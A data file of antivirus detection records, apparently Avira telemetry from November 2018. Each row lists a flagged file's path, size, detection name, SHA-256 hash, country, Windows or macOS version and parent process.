  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:00:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055727-260b7da2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055727-260B7DA2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050508-d6f70532', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050508-D6F70532', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053520-0f23b8fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053520-0F23B8FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061001-e72809b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061001-E72809B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062356-d8deb5bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062356-D8DEB5BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054711-b67c7532', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054711-B67C7532', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054838-ea6f1dd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054838-EA6F1DD9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:34:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055147-5afc0c57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055147-5AFC0C57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050610-fba3efc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050610-FBA3EFC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054710-b6109067', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054710-B6109067', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052633-d4837905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052633-D4837905', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051920-d27581ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051920-D27581AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155839-dca27e9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155839-DCA27E9F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:19:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154750-6f30a3b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154750-6F30A3B3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transfer_wireless_settings.htm', filepath='F:\\1005\\NtwkPortMon\\help\\generic\\nl\\transfer_wireless_settings.htm', filesize=376000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='4156f4d4c6dcd10fd89dad7ea0e2a96cd76855c4eb7a0c64ddee7a96272cb2c4', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T03:35:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110816-ac81498f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-110711-A0F208E5\\AVSCAN-20181101-110816-AC81498F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:08:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0af08c3a8c1600b6bd8b4ee9e28f2dc77e3233a4b68fa57393067d783df03eb1.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0AF08C3A8C1600B6BD8B4EE9E28F2DC77E3233A4B68FA57393067D783DF03EB1.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0af08c3a8c1600b6bd8b4ee9e28f2dc77e3233a4b68fa57393067d783df03eb1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:14:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10327267\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:24:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kuuls.exe', filepath='\\\\?\\D:\\KUULS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~pp35a.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp35A.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:02:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audit smk3.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\Hari 7 (Iskandar Fauzi)\\AUDIT SMK3\\AUDIT SMK3.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155409-31b6c58b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155409-31B6C58B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:12:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dtlite4491-0356.exe', filepath='J:\\prog\\program\\DTLite4491-0356.exe', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='04b60e21e23495c4f85c5f90e169866497f01f423bcccd17031a3576d21d3e08', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Novicorp WinToFlash\\WinToFlash.exe', parentsize=2985472, timestamp='2018-11-01T20:38:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gmisc.exe', filepath='E:\\gMISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191230-3c918f87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191230-3C918F87', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3bbcddfbcb55c2d2e07841ad444d207fef8aad19af1ad587835534f57b500ec6', metadata=Row(cmdline='-k netsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:40:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154905-7bea7059', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154905-7BEA7059', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:05:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154707-67fcb840', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154707-67FCB840', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T19:03:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='bbd4091a14df0b36659c02cc3d781d16be0c6a17572212c2413a513955db0eb7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e2dd52bf80724e44332a5583ee930b228c00f50b77b25ae92b6623c8f14494f4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\E2DD52BF80724E44332A5583EE930B228C00F50B77B25AE92B6623C8F14494F4', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='e2dd52bf80724e44332a5583ee930b228c00f50b77b25ae92b6623c8f14494f4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:08:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111303-0a5885d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111303-0A5885D8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{85B2A636-8950-4577-B936-A1B3248BCC3B} S-1-5-18:NT AUTHORITY\\\\System:Service:', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:03:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122809-c96d4277', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122746-B60B2D05\\AVSCAN-20181101-122809-C96D4277', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:28:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='air mata mutiara.htm', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-01_13-10-48\\Air mata mutiara.htm', filesize=256000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='7735f6dc0230d0498acf397dbd2cc5983b77ec2375f2ecafb40e8650ffaffb39', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T06:50:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111345-0fb36697', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111345-0FB36697', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111256-0971c914', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111256-0971C914', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d66ad6dd19ff8db0d758fb497218415814bd6373902733e95f0c2b1a98647086', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2757616, timestamp='2018-11-01T20:14:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111637-254cac00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111637-254CAC00', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114012-6833f3db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20c0a6b1\\AVSCAN-20181101-113913-60849088\\AVSCAN-20181101-114012-6833F3DB', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:40:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:56:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='en-us.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\en-US.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112013-409244ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112013-409244FF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:44:21Z'), dt=datetime.date(2018, 11, 1)),
